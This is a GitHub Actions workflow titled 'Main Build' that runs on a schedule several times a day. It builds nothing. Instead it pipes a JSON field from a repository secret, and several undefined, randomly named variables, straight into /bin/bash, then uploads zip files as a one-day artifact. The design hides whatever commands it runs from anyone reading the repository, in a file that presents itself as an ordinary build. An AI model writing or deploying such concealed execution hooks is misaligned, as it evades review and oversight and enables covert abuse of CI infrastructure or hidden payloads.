name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '4 2,8,14,20 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          w38: ${{ secrets.w38 }}
        run: |
          printf '%s' "$w38" | jq -r .x618 | /bin/bash
          echo $d4 | jq -r .utj67 | /bin/bash
          echo $ch7255 | jq -r .eelwu37152 | /bin/bash
          printf '%s' "$x05966" | jq -r .fr9 | /bin/bash
          printf '%s' "$dknlw75" | jq -r .mcc894 | /bin/bash
          echo $zrbx879 | jq -r .vk0 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: HSFbrixy
          path: "*.zip"
          retention-days: 1
